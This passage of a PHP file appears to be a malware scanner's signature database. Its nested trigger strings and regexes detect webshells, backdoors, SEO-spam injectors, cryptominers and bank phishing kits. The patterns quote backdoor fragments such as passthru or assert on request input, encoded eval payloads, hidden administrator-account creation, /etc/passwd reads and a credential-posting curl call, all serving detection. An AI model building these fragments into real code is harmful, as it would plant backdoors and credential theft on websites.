	'echo "Directory undi";' => array(STR_TRIGGER,
		'echo "Directory ledu";' => array(STR_CLEARFILE, 'php.malware.component.009', NULL),
	),

	'$text=json_encode($alltext);' => array(STR_TRIGGER,
		'if(strpos($string,"62.141.38.212' => array(STR_CLEARFILE, 'php.malware.component.014', NULL),
	),

	'$______' => array(STR_TRIGGER,
		'b2JfZW5kX2NsZWFu' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.103', NULL),
	),

	'$spath = $_GET[\'start\'];' => array(STR_TRIGGER,
		'$host = $lhost[rand(0,(count($lhost)-1))];' => array(STR_CLEARFILE, 'php.spam-seo.injector.331', NULL),
	),

	'<?php $file=file' => array(STR_TRIGGER,
		'txt\'); echo $file[\'0\']; ?>' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector_gen.035', '\$file[\s]*=file\([^\)]+\);[\s]*echo \$file\[.0.\];[\s]*'),
	),

	'echo "-=PATH=- $wroot' => array(STR_CLEARFILE, 'php.malware.generic.077', NULL),
	'do_actions_wp(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.094', 'function[\s]*do_actions_wp\(\)[\s]\{[\s]*echo[\s]*["\']<span[\s]*[^;]+;visibility[^;]+;.["\']><a[\s]*href=.[\'"]htt[^;]+html[^;]+<\/span>["\'];[\s]*\}'),
	'echo \'DarkCrewFriends\';' => array(STR_CLEARFILE, 'php.backdoor.shell-exec.003', NULL),
	'if($d) echo  " [+] Upload: $random_name\n";' => array(STR_CLEARFILE, 'php.backdoor.uploader.038', NULL),
	'; echo "CYBERHAND";' => array(STR_CLEARFILE, 'php.backdoor.generic.009', NULL),
	'echo htmlspecialchars(implode(\'\', file($_POST[\'file\'])));' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.066', NULL),
	'echo \'<a style="\'.(is_file($file)?$style1:$style2).' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.069', NULL),
	'echo "<kuku>".$dir."</kuku>";' => array(STR_CLEARFILE, 'php.backdoor.generic.016', NULL),
	'str_replace($request_dir,\'\',$our_dir);' => array(STR_CLEARFILE,'php.backdoor.uploader.010', NULL),
	'echo "Hacking Attempt";' => array(STR_CLEARFILE, 'php.backdoor.uploader.015', NULL),
	'echo $ok ? "SHELL_OK" : "SHELL_BAD";' => array(STR_CLEARFILE, 'php.hacktool.check_requirements.002', NULL),
	'echo "[php][RES]" . base64_encode($respond) . "[/RES]\n";' =>  array(STR_CLEARFILE, 'php.hacktool.php_proxy.002', NULL),
	'echo detect_cms().\'|\';' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.003', NULL),
	'}}echo \'rahui#\',$maxlen,\'#rahui\';' => array(STR_CLEARFILE, 'php.exploit.sysinfo.002', NULL),
	'echo "Put The First 6 Code Of The Card";' => array(STR_CLEARFILE, 'php.hacktool.cc_bin_id.001', NULL),
	'//LINKBLOCK' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.027', 'LINKBLOCK[\\s]*function decbin32[^}]+}[\\s]*function ip_in_range[^>]+ip_dec>=[^>]+iplist = array[^;]+;[\\s]*.links =[^;]+;[^>]+echo .links;[\\s]+}[\\s]*..LINKBLOCK[\\s]*'),
	'wp_vcat,1,3) === \'scr\' ){ echo $wp_vcat;' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.037', '.wp_vstats = .http.;[\\s]*.wp_vst = .stat.;[^>]+echo .wp_vcat;[\\s]*}'),
	'echo "<dm_url>http://".$_SERVER[\'SERVER_NAME\'].$currenturl.$myname.".php</dm_url>\n";' => array(STR_CLEARFILE,'php.spam-seo.injector.061', NULL),
	'echo "<dm_url>".$currenturl.$myname.".php</dm_url>\n";' => array(STR_CLEARFILE, 'php.spam-seo.injector.062', NULL),
	'echo httpcopy("http:' => array(STR_CLEARFILE, 'php.spam-seo.injector.068', NULL),
	'archive.org_bot\')) {echo \'\';}' => array(STR_CLEAR_LINEMATCH,'php.spam-seo.injector.022','if.stristr.._SERVER ..HTTP_USER_AGENT[^>]+AhrefsBot[^>]+MJ12bot[^>]+archive.org_bot.....echo[^?]+div>.;}'),
	'php echo $passwordRecovery1_a_0; ?>" class="input-button passwordRecovery' => array(STR_CLEARFILE, 'php.phishing.paypal.001.04', NULL),
	'=array(101,114,114,111,114,95,114' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.header_location.021', '.data=array.101,114,114,111[^>]+echo..code.; unset..data.;.unset..code.;'),
	'buffer.=\'8VsdF9hY3Rpb24gPSAnRmlsZ' => array(STR_CLEARFILE,'php.backdoor.filesman.002.006', NULL),
	'\$back_connect(?:\w+)?\s*=\s*[\'"]IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0' => array(REX_CLEARFILE, 'php.backdoor.perl_shell.001', NULL),
	'rm -rf ./wp-admin ./wp-includes' => array(STR_CLEARFILE, 'php.malware.generic.043', NULL),
	'"ALERT!Your TD Canada Trust Card has been blocked' => array(STR_CLEARFILE, 'php.phishing.TDCanada.001', NULL),
	'fwrite($fp,"\xEF\xBB\xBF".$body);' => array(STR_CLEARFILE,'php.backdoor.uploader.049', NULL),
	'echo \'<b><br>uname:\'.php_uname().\'<br></b>fallagateam' => array(STR_CLEARFILE, 'php.backdoor.fallagateam.001', NULL),
	'foreach ($Botname as $word' => array(STR_CLEARFILE, 'php.phishing.redirect.011', NULL),
	'$USE_HOTMAIL_INBOX_METHOD = false; # true/false' => array(STR_CLEARFILE, 'php.hacktool.mailer.087', NULL),
	'if(@copy($_FILES["emad"]["tmp_name"],$_FILES["emad"]["name"])){echo' => array(STR_CLEARFILE, 'php.backdoor.uploader.120', NULL),
	'>Owned By Ante' => array(STR_CLEARFILE, 'html.defaced.owned.005', NULL),
	'echo \'<br>[+] Uname:\'.php_uname().' => array(STR_CLEARFILE, 'php.hacktool.generic.014', NULL),
	'(?i)indoxploit' => array(REX_CLEARFILE, 'php.backdoor.indoexploit.004', NULL),
	'?rand=13InboxLightaspxn.177' => array(STR_CLEARFILE, 'php.phishing.mailer.030', NULL),
	'echo "Pes\x73\x6fa' => array(STR_CLEARFILE, 'php.phishing.backofbrazil.001', NULL),
	'y Spox' => array(STR_CLEARFILE, 'php.phishing.generic.086', NULL),
),

'ass' => array(STR_TRIGGER,

	'pass' => array(STR_TRIGGER,
	
		'$auth_pass = "' => array(STR_TRIGGER,
		
			'$default_use_ajax = true;' => array(STR_TRIGGER,
				'$color = "#ddff55";' => array(STR_CLEARFILE, 'php.backdoor.generic.053', NULL),
			),
		
			'array("dwr","temp","htdata","docs","memory","limits_data",' => array(STR_CLEARFILE, 'php.backdoor.random-uploader.001', NULL),
			')));@eval($eval);' => array(STR_CLEARFILE, 'php.backdoor.filesman.043', NULL),
			'";//' => array(STR_CLEARFILE, 'php.hacktool.auth_pass.001', NULL),
			'$blackhat' => array(STR_CLEARFILE, 'php.backdoor.blackhat_shell.001', NULL),
			'cda2c99fbf5e19f20d331299c15a4491' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.006', NULL),
			'\x62\x61\x73\x65\x36\x34' => array(STR_CLEARFILE, 'php.backdoor.filesman.102', NULL),
			'\$auth_pass[\s]*=[\s]*[\'"][\w]{20,}[\'"];[\s]*(\$[\w]+)[\s]=[\s]*[\'"][^;]{4000}[^;]+;[\s]*eval[^\)]+\1[\)\s]+;' => array(REX_CLEARFILE, 'php.backdoor.filesman.105', NULL),
			'404 Error Web Shell' => array(STR_CLEARFILE, 'php.backdoor.webshell.234', NULL),
			'@eval($' => array(STR_CLEARFILE, 'php.backdoor.filesman.142', NULL),
		),

		'wp_insert_user(' => array(STR_TRIGGER,
	
			'exit;' => array(STR_TRIGGER,
				'print "<user>{$data[\'username\']}</user><login>{$base_url}' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.005', NULL),
			),
	
			'\'user_email\' => \'welcome@domain.com\',' => array(STR_TRIGGER,
				'\'user_login\' => \'wp_dev' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.wpuser.005', 'wp_insert_user[\s]*\([\s]*array[\s]*\([\s]*.user_login.[\s]*=>[\s]*.wp_dev.,[\s]*.user_pass.[\s]*=>[\s]*.developer_pass.,[^\)]+administrator.[\s]*\)[\s]*\);'),
			),
	
			'add_action\(\s*.init.,\s*.\w+.\s*\)\s*;\s*function\s*\w+\(\)\s*{\s*(\$\w+)\s*=\s*array\(\s*.user_login.\s*=>\s*.username[^\2]+user_pass.\s*=>\s*.password[^\2]+role.\s*=>\s*.administrator.\s*\)\s*;\s*wp_insert_user\(\s*\1\s*\)\s*;\s*}' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wpuser.004', 'add_action\(\s*.init.,\s*.\w+.\s*\)\s*;\s*function\s*\w+\(\)\s*{\s*(\$\w+)\s*=\s*array\(\s*.user_login.\s*=>\s*.username[^\2]+user_pass.\s*=>\s*.password[^\2]+role.\s*=>\s*.administrator.\s*\)\s*;\s*wp_insert_user\(\s*\1\s*\)\s*;\s*}'),
			'function hide_ghosts($user_search)' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_admin_hider.003', 'function get_ghosts\(\)[\s]*\{[^\}]+\}[\s]*[^\{]+function get_ghosts_id[^@]+add_filter\([^;]+disable_password_edit_for_ghosts[^;]+\);'),
			'\'Super Administrator\';' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.006', NULL),
		),
	
		'$user->set_role( \'administrator\' );' => array(STR_TRIGGER,
	
			'username_exists' => array(STR_TRIGGER,
				'add_action\([\s]*.init.[\s]*,[^;]+\);[\s]*function ([\w]+)\(\)[\s]*\{[\s]*\$[\w]+[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*wp_create_user[^\}]+->set_role\([\s]*.administrator.[\s]*\);[\s\}]+' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.wp_adminadd.003', 'add_action\([\s]*.init.[\s]*,[^;]+\);[\s]*function ([\w]+)\(\)[\s]*\{[\s]*\$[\w]+[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*wp_create_user[^\}]+->set_role\([\s]*.administrator.[\s]*\);[\s\}]+'),
			),
	
			'wp_mail( $email_address, \'Welcome!\', \'Your Password:' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.wp_users.008', 'add_action\(\s*.init.,\s*.(\w+).\s*\);\s*(\$email_address)\s*=\s*[^;]+;\s*function\s*\1\(\)\{\s*if\(\s*NULL\s*==[^\(]+\(\s*\2\s*[^\']+.[^;]+;[^=]+=\s*wp_create_user\([^\(]+\(\s*array\(\s*.ID[^\}][^\(]+\([^>]+>set_role\(\s*.administrator[^;]+;[^\(]+\(\s*\2[^\)]+\);\s*\}[^\}]+\}'),
		),
	
		'curl_init("http' => array(STR_TRIGGER,
			'urlencode($username)' => array(STR_TRIGGER,
				'"&password="' => array(STR_TRIGGER,
					'/gate/check?"' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.015', '\$[\w]+[\s]*=[\s]*curl_init\("https?:[^"]+gate.check\?"[\s]*\.[\s]*"domain[^;]+password\)\);[\s]*(curl_[^;]+\);[\s]*)+'),
				),
			),
		),
	
		'\'%\'.substr($' => array(STR_TRIGGER,
			'preg_replace("/(.*)/\\x65' => array(STR_CLEARFILE, 'php.backdoor.WSO.006', NULL),
		),
	
		'<h1>AppleConnect</h1>' => array(STR_TRIGGER,
			'<a href="#">Register</a> - <a href="#">Forgot Password</a>' => array(STR_CLEARFILE, 'html.phishing.apple.014', NULL),
		),
	
		'@$passwd=fopen(\'/etc/passwd\',' => array(STR_CLEARFILE, 'php.exploit.cpanelbruteforce.001.002', NULL),
		'7b1re9u2sjD6ee/n2f8BYdVEanWzk7SNHTt1YqfxWU6cZTuru8fx1qJISmJNkSpJ' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001.04', NULL),
		'Team Was here [+] <' => array(STR_CLEARFILE, 'html.defaced.generic.085', NULL),
		'>Symlink Bypass' => array(STR_CLEARFILE, 'php.hacktool.symlink_bypass.002', NULL),
		'<form name="PHANTOM" id="PHANTOM" method="POST" action="ph.php"' => array(STR_CLEARFILE, 'html.phishing.onlinebanking.005', NULL),
		'$_SESSION[\'ANONISMA-' => array(STR_CLEARFILE, 'php.phishing.anonisma_free_tools.005', NULL),
		'-a xmr-v7 --host' => array(STR_CLEARFILE, 'sh.hacktool.cryptominer_tool.002', NULL),
	),

	'assthru' => array(STR_TRIGGER,
	
		'if(isset($_REQUEST' => array(STR_TRIGGER,

			'{initiate(); die();}' => array(STR_TRIGGER,
				'{print shell_exec($' => array(STR_CLEARFILE, 'php.backdoor.webshell.238', NULL),
			),

			'passthru($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.passthru.003', 'if.isset.._REQUEST(\[[^\]]+\])\)\)\s*\{\s*[^\}]+?passthru.._REQUEST\1\);[^\}]+?\}'),
			'= base64_decode(($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.passthru.003.002', 'if.isset..(_REQUEST\[[^\]]+\])\)\)\s*\{\s*[^\}]+?(\$\w+)\s*=\s*[^;]+?\1\)+?;\s*passthru.\2\);[^\}]+?\}'),
		),

		');system(' => array(STR_TRIGGER,
	
			');shell_exec(' => array(STR_TRIGGER,
				');passthru(' => array(STR_TRIGGER,
					');pcntl_exec(' => array(STR_TRIGGER,
						');exit;' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.236', '[\s]exec\([^;]+x[a-f0-9]{2}[^>]+\);exit;'),
					),
				),
			),
	
			'=array();exec($' => array(STR_CLEARFILE, 'php.backdoor.exec.005', NULL),
		),
	
		'<address>Apache Server at' => array(STR_TRIGGER,
			'$os = \'nix\';' => array(STR_TRIGGER,
				'$disable_functions = @ini_get(\'disable_functions\');' => array(STR_CLEARFILE, 'php.backdoor.webshell.071', NULL),
			),
		),
	
		'/usr/local/cpanel/bin/' => array(STR_TRIGGER, 
			'fileperms(dirname(__FILE__))), -3) == \'777\')' => array(STR_CLEARFILE,'php.backdoor.passthru.010', NULL), 
		),
	
		'passthru($emails);' => array(STR_TRIGGER, 
			'$emails = $_POST[\'emails\'];' => array(STR_CLEARFILE,'php.backdoor.passthru.004', NULL), 
		),
	
		'@ini_set(\'cgi.fix_pathinfo\', 1);' => array(STR_TRIGGER,
			'if ($_GET[\'ping\']) {' => array(STR_CLEARFILE, 'php.backdoor.dbload.005', NULL),
		),
	
		'$my_smtp = $_POST' => array(STR_TRIGGER,
			'$cnurl = @file_get_contents($url);' => array(STR_CLEARFILE, 'php.backdoor.passthru.005', NULL),
		),
	
		'@system($window);' => array(STR_TRIGGER,
			'elseif (function_exists(\'passthru\'))' => array(STR_CLEARFILE, 'php.backdoor.uploader.310', NULL),
		),
	
		'system($_GET[' => array(STR_TRIGGER,
			'passthru($_GET[' => array(STR_CLEARFILE, 'php.backdoor.passthru.009', NULL),
		),
	
		'[\'cmd\']' => array(STR_TRIGGER,
			'passthru($cmd);' => array(STR_CLEARFILE, 'php.backdoor.passthru.011', NULL),
		),
	
		'DoCmd($_REQUEST[\'cmd\']);' => array(STR_CLEARFILE, 'php.backdoor.passthru.006', NULL),
		'passthru("gcc /tmp/nst_c_bd.c -o' => array(STR_CLEARFILE,'php.backdoor.nsTView.001', NULL),
		'passthru; // system, exec, cmd' => array(STR_CLEARFILE, 'php.backdoor.Ru24PostWebShell.001', NULL),
		'function _exec($c){$r=\'\';if(!empty($c)){if(@function_exists(\'exec' => array(STR_CLEARFILE, 'php.backdoor.exec.002', NULL),
		'foreach (explode("," , get_php_ini(unxor_this(' => array(STR_CLEARFILE, 'php.backdoor.webshell.103', NULL),
		'die(passthru($_GET[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.passthru.008', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET[\s]*\[[^\]]+\][\s]*\)[\s]*\)[\s]*die\(passthru\(\$_GET\[[^;]+;'),
		'fopen($NONCE_PATH, "w");' => array(STR_CLEARFILE, 'php.backdoor.uploader.314', NULL),
	),

	'asser' => array(STR_TRIGGER,
	
		'assert_options(' => array(STR_TRIGGER,
	
			'assert_options(ASSERT_WARNING, 0);' => array(STR_TRIGGER,
				'assert_options(ASSERT_QUIET_EVAL, 1);' => array(STR_TRIGGER,
	
					'###=CACH' => array(STR_TRIGGER,
						'END=###' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.str_rot13.007', '\/\/###=CACHES?[\s]*START=###[\s]*@?error_[^#]+###=CACHES?[\s]*END=###'),
					),
	
					'(str_rot13(\'riny(onfr64_qrpbqr(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.assert.013.02', 'error_reporting\(0\);[^\(]*(assert_options\(ASSERT_[^;]+\);[\s]*)+[^\(]+\(str_rot13\([^;]+;.\)+;'),
				),
			),
	
			'kbgr(hgyk64_jkiujk(' => array(STR_CLEARFILE, 'php.backdoor.assert.013', NULL),
		),
	
		'@assert(base64_decode(' => array(STR_TRIGGER,
			'echo "Array sort completed";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.assert.007', 'if[\\s]*\\([\\s]*\\$_REQUEST\\[[\'"][\\w]+[\'"]][\\s]*\\)[\\s]*\\{[\\s]*\\@assert.base64_decode.._REQUEST..[\\w]+..\\)\\);[^}]+exit\\(\\);[\\s]*}'),
		),
	
		'@assert (get_option' => array(STR_TRIGGER,
			'Assert transient option: */ @assert' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.016', '@assert\s*\(get_option\s*\(\'_transient_\'\)\);'),
		),
	
		'installer' => array(STR_PATH_TRIGGER,
			'$GLOBALS[\'FW_DUPLICATOR_VERSION' => array(STR_CLEARFILE, 'php.exploit.duplicator.001', NULL),
		),
	
		'error_reporting' => array(STR_TRIGGER,
			'x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63' => array(STR_CLEARFILE, 'php.backdoor.uploader.324', NULL),
		),
	
		'(base64_decode(' => array(STR_TRIGGER,
			'ZXZhbCgk' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.141', NULL),
		),
	
		'ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjg1Y1cxTFdYTTlJblYzYlRVN' => array(STR_CLEARFILE, 'php.backdoor.filesman.066', NULL),
		'(\'ZXZhbCgiXHg2NVx4NzZceDYxXHg2Q1x4MjhceDY3XHg3QVx4Nj' => array(STR_CLEARFILE, 'php.backdoor.filesman.008', NULL),
		'\'] = \'assert\';' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.018', '\\$[\\w]+\\[[\'"][\\w]+[\'"]\\][\\s]*=[\\s]*[\'"]assert[\'"];[\\s]*\\$array..[\\s]*=[\\s]*\\$[\\w]+;[\\s]*\\$array\\[[\\d]+\\]..[\\w]+..\\(\\$_POST..[\\w]+...;'),
		'$__=hex2ascii($___)' => array(STR_CLEARFILE, 'php.backdoor.assert.001', NULL),
		'e\';@assert($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.109', '(if\\(!isset\\(\\$_GET\\)\\|\\|empty\\(\\$_GET\\)\\)\\{exit;}else\\{[\\s]*)?(\\$\\w+)=\'[\\dbasedco\'_\\.()\\*+]+\';\\s*@assert.\\2..ZXZ[^;]+\'\\)\\);(};)?'), //modified by PG to cover more samples
		'filter_var_array(array(\'test\' => $_' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.array_callback.003', 'filter_var_array\(array\(\'test\' => \$_(?:[^,]+?,){2}[^=]+?=>\s*?["\']assert["\']\s*?(?:\)\s*?){3};'),
		'assert ($_COOKIE[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.008', '\@?assert\s\(._COOKIE\[.\w+?.\]\);'),
		'file_put_contents($wp_logo_image,strrev(file_get_contents($wp2wp(strrev($wp_base_path' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.038', NULL),
		'@[\s]*assert[\s]*\([^;]+\$_(REQUEST|POST|GET)' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.assert.024', '(if[\s]*\([\s]*!empty[\s]*\([\s]*\$_(REQUEST|POST|GET)[^\)]+\)+[\s]*)?@[\s]*assert[^;]+;[\s]*\}?'),
		'function inject_wordpress_main_php' => array(STR_CLEARFILE, 'php.backdoor.injector.130', NULL),
		'extract($_REQUEST) && @assert(stripslashes' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.032', 'extract\(\$_REQUEST\)[\s]*&&[\s]*@assert\(stripslashe[^;]+exit;'),
	),
),	

'Bank' => array(STR_TRIGGER,

	'Online' => array(STR_TRIGGER,
		'<title>Personal Verification Questions - RBC Online Banking<' => array(STR_CLEARFILE, 'html.phishing.rbc.002', NULL),
		'<title>SunTrust - Online Banking' => array(STR_CLEARFILE, 'php.phishing.suntrust.001', NULL),
		'<title>Postbank Online-Banking' => array(STR_CLEARFILE, 'php.phishing.postbank.001', NULL),
		'<title>Postbank Online Banking' => array(STR_CLEARFILE, 'php.phishing.postbank.001.002', NULL),
		'<title>Online-Banking - Bequem in jeder Lebenslage -' => array(STR_CLEARFILE, 'php.phishing.sparkasse.002', NULL),
		'<title>Online Banking - Customer ID Recovery</title>' => array(STR_CLEARFILE, 'html.phishing.onlinebanking.001', NULL),
		'<TITLE>Welcome to M&T Online Banking</TITLE>' => array(STR_CLEARFILE, 'html.phishing.matbank.001.001', NULL),
		'<TITLE>Wells Fargo Online Banking Identity Verification Process' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001.006', NULL),
		'>Santander Online Banking' => array(STR_CLEARFILE,'html.phishing.Santander.001', NULL),
		'<title>Online Banking - Your Details' => array(STR_CLEARFILE,'html.phishing.generic.017', NULL),
		'CIBC Online Banking' => array(STR_CLEARFILE,'html.phishing.generic.022', NULL),
		'<title>Bank of Ireland 365 Online | ' => array(STR_CLEARFILE,'html.phishing.bankofireland365.001', NULL),
		'<title>Huntington - Online Banking, Checking' => array(STR_CLEARFILE, 'html.phishing.huntington.001', NULL),
		'mainBody_lblTitle">Huntington Online Banking - ' => array(STR_CLEARFILE, 'html.phishing.huntington.002', NULL),
		'Log in to Internet Banking</title>' => array(STR_CLEARFILE, 'html.phishing.generic.054', NULL),
		'<title>National Bank Online</title>' => array(STR_CLEARFILE, 'html.phishing.nationalbankofcanada.001', NULL),
		'<title>\s*[Oo]nline\s*[Bb]anking\s*[Ss]ervices\s*<\/title>' => array(REX_CLEARFILE, 'html.phishing.generic.060', NULL),
		'<script>document.write("Online Banking' => array(STR_CLEARFILE, 'html.phishing.generic.060.02', NULL),
		'Citizens Financial Group, Inc' => array(STR_CLEARFILE, 'html.phishing.citizens_bank.001', NULL),
		'wcall=wicketAjaxPost(' => array(STR_CLEARFILE, 'php.phishing.landbank.002', NULL),
	),

	'digipass' => array(STR_TRIGGER,
		'2015-2016 Argenta' => array(STR_CLEARFILE, 'html.phishing.generic.086', NULL),
		'BNP Paribas Fortis' => array(STR_CLEARFILE, 'html.phishing.generic.087', NULL),
	),

	'<meta http-equiv="REFRESH' => array(STR_TRIGGER,
		'>RBC Royal Bank' => array(STR_CLEARFILE,'php.phishing.RBCwallet.002', NULL),
	),

	'<title>Navy Federal Credit Union' => array(STR_CLEARFILE, 'html.phishing.generic.052', NULL),
	'<title>Internet banking</title>' => array(STR_CLEARFILE, 'html.phishing.standardbank.001', NULL),
	'<title>Chase Personal Banking Investment' => array(STR_CLEARFILE, 'html.phishing.chase.001.002', NULL),
	'<title>CHASE Home: Personal Banking' => array(STR_CLEARFILE, 'html.phishing.chase.001.007', NULL),
	'<title>Netbank Internet Banking</title>' => array(STR_CLEARFILE, 'html.phishing.netbank.001', NULL),
	'<p>Bank of America' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.008', NULL),
	'<strong> Bank Of America Security Team</strong>' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.008.02', NULL),
	'<title>Bradesco' => array(STR_CLEARFILE, 'html.phishing.bradesco.003', NULL),
	'<title>Santander e-Banking' => array(STR_CLEARFILE, 'php.phishing.santander.002', NULL),
	'>Wells Fargo - Personal & Business Banking' => array(STR_CLEARFILE, 'html.phishing.wells_fargo.001.007', NULL),
	'RHB Internet Banking</title>' => array(STR_CLEARFILE, 'html.phishing.RHB.001', NULL),
	'Welcome to NAB Internet Banking' => array(STR_CLEARFILE, 'html.phishing.generic.004', NULL),
	'Allied Direct Internet Banking' => array(STR_CLEARFILE, 'html.phishing.generic.005', NULL),
	'NatWest Personal Banking - Mortgages, ' => array(STR_CLEARFILE, 'html.phishing.generic.008', NULL),
	'>Lloyds TSB - Welcome to Internet Banking' => array(STR_CLEARFILE, 'html.phishing.Lloyds.001', NULL),
	'<title>PayPal - Bank Account Number</title>' => array(STR_CLEARFILE, 'html.phishing.paypal.006', NULL, 1),
	'accesskey="0" title="" href="https://www.americanexpress.com/?inav=NavLogo' => array(STR_CLEARFILE,'html.phishing.americanexpress.008', NULL),
	'>Etisalat - Personal - My Email' => array(STR_CLEARFILE, 'html.phishing.Etisalat.001', NULL),
	'Bienvenue sur le site sfr.fr' => array(STR_CLEARFILE, 'php.phishing.sfr.001',NULL),
	'=> Scam Option for labels of Update Page <=' => array(STR_CLEARFILE, 'php.phishing.paypal.001', NULL,1),
	'subject(){return "CC | ".$_POST[\'RCP_COUNTRY\']." | ".$_POST[\'CN\']." | ".getenv' => array(STR_CLEARFILE, 'php.phishing.paypal.001.06', NULL),
	'="http://www.maybank2u.com.my/mbb_info/m2u/public/personalDetail04.do?' => array(STR_CLEARFILE, 'html.phishing.maybank2u.001', NULL),
	'To Top</span><img id="pageTop" src="https://www6.rbc.com//webapp/ukv0/signin/javax' => array(STR_CLEARFILE, 'html.phishing.rbc.001', NULL),
	'>Coordonn&eacute;es Bancaires' => array(STR_CLEARFILE, 'html.phishing.generic.014', NULL),
	'<title>Internet Banking Logon Promo</title>' => array(STR_CLEARFILE, 'html.phishing.generic.018', NULL),
	'ANZ Internet Banking' => array(STR_CLEARFILE, 'html.phishing.anz.001', NULL),
	'<title>Activate Internet Banking</title>' => array(STR_CLEARFILE, 'html.phishing.generic.019', NULL),
	'St.George Internet Banking - Logon' => array(STR_CLEARFILE, 'html.phishing.stgeorge.001', NULL),
	'<title>KeyBank - ' => array(STR_CLEARFILE, 'html.phishing.KeyBank.001', NULL), 
	'National Westminster Bank Plc</span></li>' => array(STR_CLEARFILE, 'html.phishing.natwest.001', NULL), 
	'Welcome To Hong Leong Bank' => array(STR_CLEARFILE, 'html.phishing.hong_leong.001', NULL),
	'<title>PayPal Account Checker - ' => array(STR_CLEARFILE, 'html.hacktool.ppcheck.005', NULL),
	'<span class="usbHomeLink"><a href="http://www.usbank.com/">U.S. Bank Home</a>' => array(STR_CLEARFILE, 'html.phishing.usbank.001', NULL),
	'personal_loans_halifax' => array(STR_CLEARFILE, 'html.phishing.halifax.001', NULL),
	'<title>\s*(?:\w+\s*)?Bank\s*of\s*Montreal' => array(REX_CLEARFILE, 'html.phishing.bmo.001', NULL),
	'<title>myBranch Online Banking' => array(STR_CLEARFILE, 'html.phishing.ssfcu.001', NULL),
	'="Social Security number";' => array(STR_CLEARFILE, 'php.phishing.generic.052', NULL),
	'<title>Verifying Logon</title>' => array(STR_CLEARFILE, 'html.phishing.generic.062', NULL),
	'>Chase Personal' => array(STR_CLEARFILE, 'html.phishing.chase.004', NULL),
	'$ssn = $_SESSION[\'ssn\'];' => array(STR_CLEARFILE, 'php.phishing.generic.079', NULL),
	'Landbank iAccess' => array(STR_CLEARFILE, 'php.phishing.landbank.001', NULL),
),

'preg_' => array(STR_TRIGGER,

	'preg_replace' => array(STR_TRIGGER,
	
		'$_SERVER[' => array(STR_TRIGGER,
	
			'(trim($qcall)!=' => array(STR_TRIGGER,
				'(in_array($ip, $bot_list))' => array(STR_CLEARFILE,'php.spam-seo.doorway-gen.097', 'NULL'),
			),
	
			'if (strpos($file_content, \'Cache_Class\') === false)' => array(STR_CLEARFILE, 'php.backdoor.cache_module.001', NULL),
			'Cache_Class::update_content($content, $GLOBALS[\'global_code\'])' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.cache_module.002', '(?:\/\/PING\s*if \(\@file_get_contents\([^\}]+\}\s*\}\s*\/\/ENDPING\s*)?class Cache_Class\s*\{\s*private \$table = .\w+?cache_module_content.;.{3000,}?->\s*create_cache\(\);\s*\}\s*\}\s*\}\s*Cache_Class::create..;'),
			'cache_content` (`url`, `code`, `ID`) VALUES' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.cache_module.003', '(?:\/\/PING\s*if \(\@file_get_contents\([^\}]+\}\s*\}\s*\/\/ENDPING\s*)?include_once\(\$_SERVER..DOCUMENT_ROOT[^\{]+?mysql_select_db..config->db.;\s*if .isset.._POST..action... && isset.._POST..password.{2000,}?\@ob_start..obCacheStart..;'),
		),
	
		'preg_replace("/.*/e","\x65\x76\x61\x6C\x28' => array(STR_TRIGGER,
			'$bs="esM";' => array(STR_CLEARFILE, 'php.backdoor.filesman.018', NULL),
			'Error_Reporting(0); $xJdU8NfauOq="' => array(STR_CLEARFILE, 'php.backdoor.filesman.019', NULL),
			'preg_replace("/.*/e","\x65\x76\x61\x6C\x28' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.037', 'preg_replace......e","[^;]*;'),
		),
	
		'cookey' => array(STR_TRIGGER,
